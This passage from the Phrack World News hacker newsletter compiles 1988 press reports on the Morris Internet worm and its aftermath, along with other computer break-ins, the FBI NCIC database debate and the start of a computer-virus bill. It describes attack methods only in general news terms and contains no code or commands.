Computer security experts said that the episode illustrated the vulnerability of computer systems and that incidents like this could be expected to happen repeatedly if awareness about computer security risks was not heightened. "This was an accident waiting to happen; we deserved it," said Geoffrey Goodfellow, president of Anterior Technology Inc. and an expert on computer communications. "We needed something like this to bring us to our senses. We have not been paying much attention to protecting ourselves." Peter Neumann, a computer security expert at SRI International Inc. in Menlo Park International, said, "Thus far the disasters we have known have been relatively minor. The potential for rather extraordinary destruction is rather substantial." "In most of the cases we know of, the damage has been immediately evident. But if you contemplate the effects of hidden programs, you could have attacks going on and you might never know it." _______________________________________________________________________________ Virus Attack November 6, 1988 ~~~~~~~~~~~~ >From the Philadelphia Inquirer (Inquirer Wire Services) ITHACA, N.Y. - A Cornell University graduate student whose father is a top government computer-security expert is suspected of creating the "virus" that slowed thousands of computers nationwide, school officials said yesterday. The Ivy League university announced that it was investigating the computer files of 23-year-old Robert T. Morris, Jr., as experts across the nation assessed the unauthorized program that was injected Wednesday into a military and university system, closing it for 24 hours. The virus slowed an estimated 6,000 computers by replicating itself and taking up memory space, but it is not believed to have destroyed any data. M. Stuart Lynn, Cornell vice president for information technologies, said yesterday that Morris' files appeared to contain passwords giving him unauthorized access to computers at Cornell and Stanford Universities. "We also have discovered that Morris' account contains a list of passwords substantially similar to those found in the virus," he said at a news conference. Although Morris "had passwords he certainly was not entitled to," Lynn stressed, "we cannot conclude from the existence of those files that he was responsible." FBI spokesman Lane Betts said the agency was investigating whether any federal laws were violated. Morris, a first-year student in a doctoral computer-science program, has a reputation as an expert computer hacker and is skilled enough to have written the rogue program, Cornell instructor Dexter Kozen said. When reached at his home yesterday in Arnold, Md., Robert T. Morris, Sr., chief scientist at the National Computer Security Center in Bethesda, Md., would not say where his son was or comment on the case. The elder Morris has written widely on the security of the Unix operating system, the target of the virus program. He is widely known for writing a program to decipher passwords, which give users access to computers. _______________________________________________________________________________ New News From Hacker Attack On Philips France, 1987 November 7, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A German TV magazine reported (last week) that the German hackers which attacked, in summer 1987, several computer systems and networks (including NASA, the SPANET, the CERN computers which are labeled "European hacker center," as well as computers of Philips France and Thompson-Brandt/France) had transferred design and construction plans of the MegaBit chip having been developed in the Philips laboratories. The only information available is that detailed graphics are available to the reporters showing details of the MegaBit design. Evidently it is very difficult to prosecute this data theft since German law does not apply to France based enterprises. Moreover, the German law may generally not be applicable since its prerequit may not be true that PHILIPS' computer system has "special protection mechanisms." Evidently, the system was only be protected with UID and password, which may not be a sufficient protection (and was not). Evidently, the attackers had much more knowledge as well as instruments (e.g. sophisticated graphic terminals and plotters, special software) than a "normal hacker" has. Speculations are that these hackers were spions rather than hackers of the Chaos Computer Club (CCC) which was blamed for the attack. Moreover, leading members of CCC one of whom was arrested for the attack, evidently have not enough knowledge to work with such systems. Information Provided By Klaus Brunnstein, Hamburg, FRG _______________________________________________________________________________ The Computer Jam: How It Came About November 8, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By John Markoff (New York Times) Computer scientists who have studied the rogue program that crashed through many of the nation's computer networks last week say the invader actually represents a new type of helpful software designed for computer networks. The same class of software could be used to harness computers spread around the world and put them to work simultaneously. It could also diagnose malfunctions in a network, execute large computations on many machines at once and act as a speedy messenger. But it is this same capability that caused thousands of computers in universities, military installations and corporate research centers to stall and shut down the Defense Department's Arpanet system when an illicit version of the program began interacting in an unexpected way. "It is a very powerful tool for solving problems," said John F. Shoch, a computer expert who has studied the programs. "Like most tools it can be misued, and I think we have an example here of someone who misused and abused the tool." The program, written as a "clever hack" by Robert Tappan Morris, a 23-year-old Cornell University computer science graduate student, was originally meant to be harmless. It was supposed to copy itself from computer to computer via Arpanet and merely hide itself in the computers. The purpose? Simply to prove that it could be done. But by a quirk, the program instead reproduced itself so frequently that the computers on the network quickly became jammed. Interviews with computer scientists who studied the network shutdown and with friends of Morris have disclosed the manner in which the events unfolded. The program was introduced last Wednesday evening at a computer in the artificial intelligence laboratory at the Massachusetts Institute of Technology. Morris was seated at his terminal at Cornell in Ithaca, N.Y., but he signed onto the machine at MIT. Both his terminal and the MIT machine were attached to Arpanet, a computer network that connects research centers, universities and military bases. Using a feature of Arpanet, called Sendmail, to exchange messages among computer users, he inserted his rogue program. It immediately exploited a loophole in Sendmail at several computers on Arpanet. Typically, Sendmail is used to transfer electronic messages from machine to machine throughout the network, placing the messages in personal files. However, the programmer who originally wrote Sendmail three years ago had left a secret "backdoor" in the program to make it easier for his work. It permitted any program written in the computer language known as C to be mailed like any other message. So instead of a program being sent only to someone's personal files, it could also be sent to a computer's internal control programs, which would start the new program. Only a small group of computer experts -- among them Morris -- knew of the backdoor. As they dissected Morris's program later, computer experts found that it elegantly exploited the Sendmail backdoor in several ways, copying itself from computer to computer and tapping two additional security provisions to enter new computers. The invader first began its journey as a program written in the C language. But it also included two "object" or "binary" files -- programs that could be run directly on Sun Microsystems machines or Digital Equipment VAX computers without any additional translation, making it even easier to infect a computer. One of these binary files had the capability of guessing the passwords of users on the newly infected computer. This permits wider dispersion of the rogue program. To guess the password, the program first read the list of users on the target computer and then systematically tried using their names, permutations of their names or a list of commonly used passwords. When successful in guessing one, the program then signed on to the computer and used the privileges involved to gain access to additonal computers in the Arpanet system. Morris's program was also written to exploit another loophole. A program on Arpanet called Finger lets users on a remote computer know the last time that a user on another network machine had signed on. Because of a bug, or error, in Finger, Morris was able to use the program as a crowbar to further pry his way through computer security. The defect in Finger, which was widely known, gives a user access to a computer's central control programs if an excessively long message is sent to Finger. So by sending such a message, Morris's program gained access to these control programs, thus allowing the further spread of the rogue. The rogue program did other things as well. For example, each copy frequently signaled its location back through the network to a computer at the University of California at Berkeley. A friend of Morris said that this was intended to fool computer researchers into thinking that the rogue had originated at Berkeley. The program contained another signaling mechanism that became its Achilles' heel and led to its discovery. It would signal a new computer to learn whether it had been invaded. If not, the program would copy itself into that computer. But Morris reasoned that another expert could defeat his program by sending the correct answering signal back to the rogue. To parry this, Morris programmed his invader so that once every 10 times it sent the query signal it would copy itself into the new machine regardless of the answer. The choice of 1 in 10 proved disastrous because it was far too frequent. It should have been one in 1,000 or even one in 10,000 for the invader to escape detection. But because the speed of communications on Arpanet is so fast, Morris's illicit program echoed back and forth through the network in minutes, copying and recopying itself hundreds or thousands of times on each machine, eventually stalling the computers and then jamming the entire network. After introducing his program Wednesday night, Morris left his terminal for an hour. When he returned, the nationwide jamming of Arpanet was well under way, and he could immediately see the chaos he had started. Within a few hours, it was clear to computer system managers that something was seriously wrong with Arpanet. By Thursday morning, many knew what had happened, were busy ridding their systems of the invader and were warning colleagues to unhook from the network. They were also modifying Sendmail and making other changes to their internal software to thwart another invader. The software invader did not threaten all computers in the network. It was aimed only at the Sun and Digital Equipment computers running a version of the Unix operating system written at the University of California at Berkeley. Other Arpanet computers using different operating systems escaped. These rogue programs have in the past been referred to as worms or, when they are malicious, viruses. Computer science folklore has it that the first worms written were deployed on the Arpanet in the early 1970s. Researchers tell of a worm called "creeper," whose sole purpose was to copy itself from machine to machine, much the way Morris's program did last week. When it reached each new computer it would display the message: "I'm the creeper. Catch me if you can!" As legend has it, a second programmer wrote another worm program that was designed to crawl through the Arpanet, killing creepers. Several years later, computer researchers at the Xerox Corp.'s Palo Alto Research Center developed more advanced worm programs. Shoch and Jon Hupp developed "town crier" worm programs that acted as messengers and "diagnostic" worms that patrolled the network looking for malfunctioning computers. They even described a "vampire" worm program. It was designed to run very complex programs late at night while the computer's human users slept. When the humans returned in the morning, the vampire program would go to sleep, waiting to return to work the next evening. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Comments from Mark Eichin (SIPB Member & Project Athena "Watchmaker"); The following paragraph from Markoff's article comes from a telephone conversation he had with me at the airport leaving the November 8, 1988 "virus conference": "But Morris reasoned that another expert could defeat his program by sending the correct answering signal back to the rogue. To parry this, Morris programmed his invader so that once every 10 times it sent the query signal it would copy itself into the new machine regardless of the answer. The choice of 1 in 10 proved disastrous because it was far too frequent. It should have been one in 1,000 or even one in 10,000 for the invader to escape detection." However, it is incorrect (I did think Markoff had grasped my comments, perhaps not). The virus design seems to have been to reinfect with a 1 in 15 chance a machine already infected. The code was BACKWARD, so it reinfected with a *14* in 15 chance. Changing the denominator would have had no effect. _______________________________________________________________________________ US Is Moving To Restrict Access To Facts About Computer Virus Nov. 11, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By John Markoff (New York Times) Government officials are moving to bar wider dissemination of information on techniques used in a rogue software program that jammed more than 6,000 computers in a nationwide computer network last week. Their action comes amid bitter debate among computer scientists. One group of experts believes wide publication of such information would permit computer network experts to identify problems more quickly and to correct flaws in their systems. But others argue that such information is too potentially explosive to be widely circulated. Yesterday, officials at the National Computer Security Center, a division of the National Security Agency (NSA), contacted researchers at Purdue University in West Lafayette, Indiana, and asked them to remove information from campus computers describing internal workings of the software program that jammed computers around the nation on November 3, 1988. (A spokesperson) said the agency was concerned because it was not certain that all computer sites had corrected the software problems that permitted the program to invade systems in the first place. Some computer security experts said they were concerned that techniques developed in the program would be widely exploited by those trying to break into computer systems. _______________________________________________________________________________ FBI Studies Possible Charges In "Virus" November 12, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >From the Los Angeles Times WASHINGTON -- FBI Director William S. Sessions on Thursday added two more laws that agents are scrutinizing to determine whether to seek charges against Robert T. Morris Jr. for unleashing a computer "virus" that shut down or slowed computers across the country last week. One of the laws - malicious mischief involving government communication lines, stations or systems - appears not to require the government to prove criminal intent, a requirement that lawyers have described as a possible barrier to successful prosecution in the case. Sessions told a press conference at FBI headquarters that the preliminary phase of the investigation should be completed in two weeks and defended the pace of the inquiry in which Morris, a Cornell University graduate student, has not yet been interviewed. Friends of Morris, age 23, have said he told them that he created the virus. Sources have said that FBI agents have not sought to question Morris until they obtain the detailed electronic records of the programming he used in setting loose the virus - records that have been maintained under seal at Cornell University. In addition to the malicious mischief statue, which carries a maximum penalty of 10 years in prison, Sessions listed fraud by wire as one of the laws being considered. _______________________________________________________________________________ ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 11 of 12 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN P h r a c k W o r l d N e w s PWN PWN ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ PWN PWN Issue XXII/Part 3 PWN PWN PWN PWN Created by Knight Lightning PWN PWN PWN PWN Written and Edited by PWN PWN Knight Lightning and Taran King PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Computer Break-In November 11, 1988 ~~~~~~~~~~~~~~~~~ >From Intercom, Vol 28, No. 24, Air Force Communications Command Newsletter By Special Agent Mike Forche, AFOSI Computer Crime Investigator A computer hacker penetrated an Air Force Sperry 1160 computer system in the San Antonio, Texas, area. The hacker was discovered by alert Air Force Communications Command computer operators who notified the data base administrator than an un-authorized user was in the system. The data base administrator was able to identify the terminal, password, and USERID (system level) used by the hacker. The data base administrator quickly disabled the USERID/password (which belonged to a computer system monitor). The data base administrator then observed the hacker trying to get into the system using the old USERID/password. He watched as the hacker successfully gained entry into the system using another unauthorized USERID/password (which was also a system administrator level password). The hacker was an authorized common user in the computer system; however, he obtained system administrator access level to the government computer on both occasions. Review of the audit trail showed that the hacker had successfully gained unauthorized access to the computer every day during the two weeks the audit was run. In addition, the hacker got unauthorized access to a pay file and instructed the computer floor operator to load a specific magnetic tape (pay tape). The hacker was investigated by Air Force Office of Special Investigation computer crime investigators for violation of federal crimes (Title 18 US Codes 1030 computer fraud, and 641 wrongful conversion of government property), Texas state crimes (Title 7, Section 33.02 Texas computer crime wrongful access) and military crimes (obtaining services under false pretense, Uniform Code of Military Justice, Article 134). The computer crime investigators made the following observations: - USERIDs used by the hacker were the same ones he used at his last base when he had authorized system access in his job. The use of acronyms and abbreviations of job titles will hardly fool anyone; plus the use of standard USERID base to base is dangerous. - The passwords the hacker used were the first names of the monitors who owned the USERIDs. The use of names, phone numbers, and other common easily-guessed items have time and time again been beaten by even the unsophisticated hackers. Special Thanks To Major Douglas Hardie _______________________________________________________________________________ "Big Brotherish" FBI Data Base Assailed November, 21, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >From Knight-Ridder Newspapers (Columbia Daily Tribune) "Professionals Unite To Halt Expansion Of Files" PALO ALTO, California -- For the first time in more than a decade, civil libertarians and computer professionals are banding together to stop what many consider a Big Brotherish attempt by the FBI to keep track of people's lives. Computer Professionals for Social Responsibility, based in Palo Alto, has been instrumental in preventing the FBI from expanding its data base to include information such as credit card transactions, telephone calls, and airline passenger lists. "We need computer professionals acting like public interest lawyers to make sure the FBI is acting responsibly," said Jerry Berman, chief legislative counsel for the American Civil Liberties Union. Berman was part of a panel Saturday at Stanford University that went head-to-head with the FBI's assistant director for technical services, William Bayse, over expansion of the National Crime Information Center. Law enforcement officials use the NCIC system's 19.4 million files about 700,000 times a day for routine checks on everyone from traffic violators to Peace Corps applicants. "The FBI would like us to believe that they are protecting us from the hick Alabama sheriff who wants to misuse the system," said Brian Harvey, a computer expert at the University of California-Berkeley. "The FBI is the problem." Not since the fight to pass the Privacy Act of 1974 have computer experts, civil libertarians, and legislators come together on the issue of citizen rights and access to information. In the early 1970s, the government's efforts to monitor more than 125,000 war protesters sparked concerns about privacy. The 1974 law limited the movement of information exchanged by federal agencies. But computers were not so sophisticated then, and the privacy act has a number of exceptions for law enforcement agencies, Rotenberg said. No laws curtail the FBI's data base. Two years ago, the FBI announced its plan to expand the data base and came up with 240 features to include, a sort of "wish list" culled from the kinds of information law enforcement officials who use the system would like to have. Rep. Don Edwards, D-Calif., balied at moving ahead with the plan without suggestions from an independent group, and put together a panel that includes members of the Palo Alto computer organization. Working with Bayse, FBI officials eventually agreed to recommend a truncated redesign of the data base. It drops the most controversial features, such as plans to connect the data base to records of other government agencies - including the Securities and Exchange Commission, the IRS, the Immigration and Naturalization Service, the Social Security Administration, and the Department of State's passport office. But FBI director William Sessions could reject those recommendations and include all or part of the wish list in the redesign. The 20-year-old system has 12 main files containing information on stolen vehicles, missing people, criminal arrests and convictions, people who are suspected of plotting against top-level government officials, and people for whom arrest warrents have been issued. _______________________________________________________________________________ Big Guns Take Aim At Virus November 21, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken From Government Computer News In the aftermath of the most recent virus infection of the Defense Data Network and Arpanet, Defense Department and National Institute of Standards and Technology computer security officials are scrambling to head off further attacks. Officials of the facilities struck by the virus met this month to discuss its nature and impact. The meeting at National Security Agency headquarters in Fort Meade, Md., included representatives of NSA and NIST as 'observers,' according to NIST computer security chief Stuart Katzke. Two days later, NSA and NIST officials met again to discuss how to avert future infections, Katzke said. Katzke, who attended both meetings, said no decisions had been reached on how to combat viruses, and NSA and NIST representatives will meet again to firm up recommendations. Katzke, however, suggested one solution would be the formation of a federal center for anti-virus efforts, operated jointly by NSA's National Computer Security Center (NCSC) and NIST. The center would include a clearinghouse that would collect and disseminate information about threats, such as flaws in operating systems, and solutions. However, funding and personnel for the center is a problem, he said, because NIST does not have funds for such a facility. The center also would help organize responses to emergencies by quickly warning users of new threats and defenses against them, he said. People with solutions to a threat could transmit their answers through the center to threatened users, he said. A database of experts would be created to speed response to immediate threats. The center would develop means of correcting flaws in software, such as trapdoors in operating systems. Vendors would be asked to develop and field solutions, he said. NIST would work on unclassified systems and the NCSC would work on secure military systems, he said. Information learned about viruses from classified systems might be made available to the public through the clearinghouse, Katzke said, although classified information would have to be removed first. Although the virus that prompted these meetings did not try to destroy data, it made so many copies of itself that networks rapidly became clogged, greatly slowing down communications. Across the network, computer systems crashed as the virus continuously replicated itself. During a Pentagon press conference on the virus outbreak, Raymond Colladay, director of the Defense Advanced Research Projects Agency (DARPA), said the virus hit 'several dozen' installations out of 300 on the agency's unclassified Arpanet network. Thousands Affected The virus also was found in Milnet, which is the unclassified portion of the Defense Data Network. Estimates of how many computers on the network were struck varied from 6,000 to 250,000. The virus did not affect any classified systems, DOD officials said. The virus hit DARPA computers in Arlington, Va., and the Lawrence Livermore Laboratories in California as well as many academic institutions, Colladay said. It also affected the Naval Ocean Systems Command in San Diego and the Naval Research Laboratory in Maryland, a Navy spokesman said. Written in C and aimed at the UNIX operating system running on Digital Equipment Corp. VAX and Sun Microsystems Inc. computers, the virus was released November 2, 1988 into Arpanet through a computer at the Massachusetts Institute of Technology in Cambridge, Mass. The Virus apparently was intended to demonstrate the threat to networked systems. Published reports said the virus was developed and introduced by a postgraduate student at Cornell University who specializes in computer security. The FBI has interviewed the student. Clifford Stoll, a computer security expert at Harvard University who helped identify and neutralize the virus, said the virus was about 40 kilobytes long and took 'several weeks' to write. It replicated itself in three ways. Spreading the Virus The first method exploited a little-known trapdoor in the Sendmail electronic-mail routine of Berkeley UNIX 4.3, Stoll said. The trapdoor was created by a programmer who wanted to remove some bugs, various reports said. However, the programmer forgot to remove the trapdoor in the final production version. In exploiting this routine, the virus tricked the Sendmail program into distributing numerous copies of the virus across the network. Another method used by the virus was an assembly language program that found user names and then tried simple variations to crack poorly conceived passwords and break into more computers, Stoll said. Yet another replication and transmission method used a widely known bug in the Arpanet Finger program, which lets users know the last time a distant user has signed onto a network. By sending a lengthy Finger signal, the virus gained access to the operating systems of Arpanet hosts. The virus was revealed because its creator underestimated how fast the virus would attempt to copy itself. Computers quickly became clogged as the virus rapidly copied itself, although it succeeded only once in every 10 copy attempts. Users across the country developed patches to block the virus' entrance as soon as copies were isolated and analyzed. Many users also used Arpanet to disseminate the countermeasures, although transmission was slowed by the numerous virus copies in the system. DARPA officials 'knew precisely what the problem was,' Colladay said. 'Therefore, we knew precisely what the fix was. As soon as we had put that fix in place, we could get back online.' Colladay said DARPA will revise security policy on the network and will decide whether more security features should be added. The agency began a study of the virus threat two days after the virus was released, he said. All observers said the Arpanet virus helped raise awareness of the general virus threat. Several experts said it would help promote computer security efforts. 'Anytime you have an event like this it heightens awareness and sensitivity,' Colladay said. However, Katzke cautioned that viruses are less of a threat than are access abusers and poor management practices such as inadequate disaster protection or password control. Excellent technical anti-virus defenses are of no use if management does not maintain proper control of the system, he said. Congress also is expected to respond to the virus outbreak. The Computer Virus Eradication Act of 1988, which lapsed when Congress recessed in October, will be reintroduced by Rep. Wally Herger (R-Calif.), according to Doug Griggs, who is on Herger's staff. _______________________________________________________________________________ Congressmen Plan Hearings On Virus November 27, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >From The Seattle Times (Newhouse News Services) WASHINGTON - The computer virus that raced through a Pentagon data network earlier this month is drawing the scrutiny of two congressional committee chairmen who say they plan hearings on the issue during the 101st Congress. Democratic Reps. Robert Roe, chairman of the House Science Space and Technology Committee, and William Hughes, chairman of the crime subcommittee of the House Judiciary Committee, say they want to know more about the self-replicating program that invaded thousands of computer systems. The two chairmen, both from New Jersey, say the are concerned about how existing federal law applies to the November 2, 1988 incident in which a 23-year-old computer prodigy created a program that jammed thousands of computers at universities, research centers, and the Pentagon. Roe said his committee also will be looking at ways to protect vital federal computers from similar viruses. "As we move forward and more and more of our national security is dependent on computer systems, we have to think more about the security and safety of those systems," Roe said. Hughes, author of the nation's most far-reaching computer crime law, said his 1986 measure is applicable in the latest case. He said the law, which carries criminal penalties for illegally accessing and damaging "federal interest" computers, includes language that would cover computer viruses. "There is no question but that the legislation we passed in 1986 covers the computer virus episodes,' Hughes said. Hughes noted that the law also includes a section creating a misdemeanor offense for illegally entering a government-interest computer. The network invaded by the virus, which included Pentagon research computers, would certainly meet the definition of a government-interest computer, he said. "The 1986 bill attempted to anticipate a whole range of criminal activity that could involve computers," he said. _______________________________________________________________________________ Pentagon Severs Military Computer From Network Jammed By Virus Nov. 30, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By John Markoff (New York Times) NEW YORK - The Pentagon said on Wednesday that it had temporarily severed the connections between a nonclassifed military computer network and the nationwide academic research and corporate computer network that was jammed last month by a computer virus program. Department of Defense officials said technical difficulties led to the move. But several computer security experts said they had been told by Pentagon officials that the decision to cut off the network was made after an unknown intruder illegally gained entry recently to several computers operated by the military and defense contractors. Computer specialists said they thought that the Pentagon had broken the connections while they tried to eliminate a security flaw in the computers in the military network. The Department of Defense apparently acted after a computer at the Mitre Corporation, a Bedford, Mass., company with several military contracts, was illegally entered several times during the past month. Officials at several universities in the United States and Canada said their computers had been used by the intruder to reach the Mitre computer. A spokeswoman for Mitre confirmed Wednesday that one of its computers had been entered, but said no classified or sensitive information had been handled by the computers involved. "The problem was detected and fixed within hours with no adverse consequences," Marcia Cohen said. The military computer network, known as Milnet, connects hundreds of computers run by the military and businesses around the country and is linked through seven gateways to another larger computer network, Arpanet. It was Arpanet that was jammed last month when Robert T. Morris, a Cornell University graduate student, introduced a rogue program that jammed computers on the network. In a brief statement, a spokesman at the Defense Communication Agency said the ties between Milnet and Arpanet, known as mail bridges, were severed at 10 p.m. Monday and that the connections were expected to be restored by Thursday. "The Defense Communications Agency is taking advantage of the loop back to determine what the effects of disabling the mail bridges are," the statement said. "The Network Information Center is collecting user statements and forwarding them to the Milnet manager." Several computer security experts said they had been told that the network connection, which permits military and academic researchers to exchange information, had been cut in response to the intruder. "We tried to find out what was wrong (Tuesday night) after one of our users complained that he could not send mail," said John Rochlis, assistant network manager at the Massachusetts Institute of Technology. "Inititally we were given the run around, but eventually they unofficially confirmed to us that the shut-off was security related." Clifford Stoll, a computer security expert at Harvard University, posted an electronic announcement on Arpanet Wednesday that Milnet was apparently disconnected as a result of someone breaking into several computers. Several university officials said the intruder had shielded his location by routing telephone calls from his computer through several networks. A manager at the Mathematics Faculty Computer Facility at the University of Waterloo in Canada said officials there learned that one of their computers had been illegally entered after receiving a call from Mitre. He said the attacker had reached the Waterloo computer from several computers, including machines located at MIT, Stanford, the University of Washington and the University of North Carolina. He said that the attacks began on November 3, 1988 and that some calls had been routed from England. A spokeswoman for the Defense Communications Agency said that she had no information about the break-in. Stoll said the intruder used a well-known computer security flaw to illegally enter the Milnet computers. The flaws are similar to those used by Morris' rogue program. It involves a utility program called "file transfer protocol (FTP" that is intended as a convenience to permit remote users to transfer data files and programs over the network. The flaw is found in computers that run the Unix operating system. The decision to disconnect the military computers upset a number of computer users around the country. Academic computer security experts suggested that the military may have used the wrong tactic to attempt to stop the illegal use of its machines. "There is a fair amount of grumbling going on," said Donald Alvarez, an MIT astrophysicist. "People think that this is an unreasonable approach to be taking." He said that the shutting of the mail gateways did not cause the disastrous computer shutdown that was created when the rogue program last month stalled as many as 6,000 machines around the country. [The hacker suspected of breaking into MIT is none other than Shatter. He speaks out about the hacker community in PWN XXII/4. -KL] _______________________________________________________________________________ MCI's New Fax Network December 1988 ~~~~~~~~~~~~~~~~~~~~~ >From Teleconnect Magazine MCI introduced America's first dedicated fax network. It's available now. The circuit-switched network, called MCI FAX, takes a slice of MCI's existing bandwidth and configures it with software to handle only fax transmissions. Customers - even MCI customers - have to sign up separately for the service, though there's currently no fee to join. Users must dedicate a standard local phone line (e.g. 1MB) to each fax machine they want on the MCI network (the network doesn't handle voice) and in return get guaranteed 9600 baud transmission, and features like management reports, customized dialing plans, toll-free fax, cast fax, several security features, delivery confirmation and a separate credit card. The system does some protocol conversion, fax messages to PCs, to telex machines or from a PC via MCI Mail to fax. The service is compatible with any make or model of Group III and below fax machine and will be sold, under a new arrangement for MCI, through both a direct sales force and equipment manufacturers, distributors and retailers. For more info 1-800-950-4FAX. MCI wouldn't release pricing, but it said it would be cheaper. _______________________________________________________________________________ Military Bans Data Intruder December 2, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Compiled From News Services NEW YORK -- The Pentagon has cut the connections between a military computer network (MILNET) and an academic research network (ARPANET) that was jammed last month by a "computer virus." The Defense Department acted, not because of the virus, but rather because an unknown intruder had illegally gained entry to several computers operated by the armed forces and by defense contractors, several computer security experts said. The Defense Department apparently acted after a computer at the Mitre Corporation of Bedford, Mass., a company with several military contracts, was illegally entered several times in the past month. Officials at several universities in the United States and Canada said their computers had been used by the intruder to reach the Mitre computer. A spokeswoman for Mitre confirmed Wednesday that one of its computers had been entered, but said no classified or sensitive information had been handled by the computers involved. "The problem was detected and fixed within hours, with no adverse consequences," Marcia Cohen, the spokeswoman said. The military computer network, known as Milnet, connects hundreds of computers run by the armed forces and businesses around the country and is linked through seven gateways to another larger computer network, Arpanet. Arpanet is the network that was jammed last month by Robert T. Morris, a Cornell University graduate student. _______________________________________________________________________________ ========================================================================= ==Phrack Inc.== Volume Two, Issue 22, File 12 of 12 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN P h r a c k W o r l d N e w s PWN PWN ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ PWN PWN Issue XXII/Part 4 PWN PWN PWN PWN Created by Knight Lightning PWN PWN PWN PWN Written and Edited by PWN PWN Knight Lightning and Taran King PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Networks Of Computers At Risk From Invaders December 3, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By John Markoff (New York Times) Basic security flaws similar to the ones that let intruders gain illegal entry to military computer networks in recent weeks are far more common than is generally believed, system designers and researchers say. And there is widespread concern that computer networks used for everyday activities like making airline reservations and controlling the telephone system are highly vulnerable to attacks by invaders considerably less skilled than the graduate student whose rogue program jammed a nationwide computer network last month. For example, the air traffic control system could be crippled if someone deliberately put wrong instructions into the network, effectively blinding controllers guiding airplanes. The two recent episodes have involved military computers: One at the Mitre Corporation, a company with Pentagon contracts, and the other into Arpanet, a Defense Department network with links to colleges. But illegal access to computer systems can compromise the privacy of millions of people. In 1984, TRW Inc. acknowledged that a password providing access to 90 million credit histories in its files had been stolen and posted on a computerized bulletin board system. The company said the password may have been used for as long as a month. This year an internal memorandum at Pacific Bell disclosed that sophisticated invaders had illegally gained access to telephone network switching equipment to enter private company computers and monitor telephone conversations. Computer security flaws have also been exploited to destroy data. In March 1986 a computer burglar gained access by telephone to the office computer of Rep. Ed Zschau of California, destroyed files and caused the computer to break down. Four days later, staff workers for Rep. John McCain of Arizona, now a senator, told the police they had discovered that someone outside their office had reached into McCain's computer and destroyed hundreds of letters and mailing addresses. In Australia last year, a skilled saboteur attacked dozens of computers by destroying an underground communication switch. The attack cut off thousands of telephone lines and rendered dozens of computers, including those at the country's largest banks, useless for an entire day. Experts say the vulnerability of commercial computers is often compounded by fundamental design flaws that are ignored until they are exposed in a glaring incident. "Some vulnerabilities exist in every system," said Peter Neumann, a computer scientist at SRI International in Menlo Park, California. "In the past, the vendors have not really wanted to recognize this." Design flaws are becoming increasingly important because of the rapidly changing nature of computer communications. Most computers were once isolated from one another. But in the last decade networks expanded dramatically, letting computers exchange information and making virtually all large commercial systems accessible from remote places. But computer designers seeking to shore up security flaws face a troubling paradox: By openly discussing the flaws, they potentially make vulnerabilities more known and thus open to sabotage. Dr. Fred Cohen, a computer scientist at the University of Cincinnati, said most computer networks were dangerously vulnerable. "The basic problem is that we haven't been doing networks long enough to know how to implement protection," Cohen said. The recent rogue program was written by Robert Tappan Morris, a 23-year-old Cornell University graduate student in computer science, friends of his have said. The program appears to have been designed to copy itself harmlessly from computer to computer in a Department of Defense network, the Arpanet. Instead a design error caused it to replicate madly out of control, ultimately jamming more than 6,000 computers in this country's most serious computer virus attack. For the computer industry, the Arpanet incident has revealed how security flaws have generally been ignored. Cohen said most networks, in effect, made computers vulnerable by placing entry passwords and other secret information inside every machine. In addition, most information passing through networks is not secretly coded. While such encryption would solve much of the vulnerability problem, it would be costly. It would also slow communication between computers and generally make networks much less flexible and convenient. Encryption of data is the backbone of security in computers used by military and intelligence agencies. The Arpanet network, which links computers at colleges, corporate research centers and military bases, is not encrypted. The lack of security for such information underscored the fact that until now there has been little concern about protecting data. Most commercial systems give the people who run them broad power over all parts of the operation. If an illicit user obtains the privileges held by a system manager, all information in the system becomes accessible to tampering. The federal government is pushing for a new class of military and intelligence computer in which all information would be divided so that access to one area did not easily grant access to others, even if security was breached. The goal is to have these compartmentalized security systems in place by 1992. On the other hand, one of the most powerful features of modern computers is that they permit many users to share information easily; this is lost when security is added. In 1985 the Defense Department designed standards for secure computer systems, embodied in the Orange Book, a volume that defines criteria for different levels of computer security. The National Computer Security Center, a division of the National Security Agency, is now charged with determining if government computer systems meet these standards. But academic and private computer systems are not required to meet these standards, and there is no federal plan to urge them on the private sector. But computer manufacturers who want to sell their machines to the government for military or intelligence use must now design them to meet the Pentagon standards. Security weaknesses can also be introduced inadvertently by changes in the complex programs that control computers, which was the way Morris's program entered computers in the Arpanet. These security weaknesses can also be secretly left in by programmers for their convenience. One of the most difficult aspects of maintaining adequate computer security comes in updating programs that might be running at thousands of places around the world once flaws are found. Even after corrective instructions are distributed, many computer sites often do not close the loopholes, because the right administrator did not receive the new instructions or realize their importance. _______________________________________________________________________________ Computer Virus Eradication Act of 1988 December 5, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is a copy of HR-5061, a new bill being introduced in the House by Wally Herger (R-CA) and Robert Carr (D-Mich.). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 100th Congress 2D Session H.R. 5061 To amend title 18, United States Code, to provide penalties for persons interfering with the operations of computers through the use of programs containing hidden commands that can cause harm, and for other purposes. IN THE HOUSE OF REPRESENTATIVES July 14, 1988 Mr. Herger (for himself and 